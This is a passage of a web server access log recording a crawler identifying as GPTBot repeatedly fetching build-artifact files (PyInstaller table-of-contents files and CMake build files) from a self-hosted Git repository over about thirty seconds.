"/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18933] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:18:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:18:18:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:18:18:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 72017] [Gzip 17.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:18:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 37040] [Gzip 14.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:18:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 70822] [Gzip 17.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:18:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 70907] [Gzip 17.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:18:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:18:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18897] [Gzip 6.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18934] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 38636] [Gzip 14.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:18:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18932] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 71224] [Gzip 17.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:18:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 72061] [Gzip 17.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:18:18:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 72087] [Gzip 17.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:18:18:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 37069] [Gzip 14.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:18:18:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -[17/Feb/2026:18:18:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:18:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:18:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:18:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 38632] [Gzip 14.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:18:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10977] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:18:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 72043] [Gzip 17.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:18:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -[17/Feb/2026:18:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11635] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:18:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:18:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 71895] [Gzip 17.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:18:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 38605] [Gzip 14.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:18:18:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -[17/Feb/2026:18:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 70853] [Gzip 17.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:18:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 72048] [Gzip 17.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:18:18:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10892] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -[17/Feb/2026:18:18:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10951] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:18:18:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10979] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:18:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:18:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 70858] [Gzip 17.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:18:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:18:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:18:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:18:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja?display=source" [Client 74.7.227.38] [Length 16405] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:18:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 38605] [Gzip 14.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:18:18:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 38636] [Gzip 14.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:18:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 71930] [Gzip 17.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:18:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:18:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 71925] [Gzip 17.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 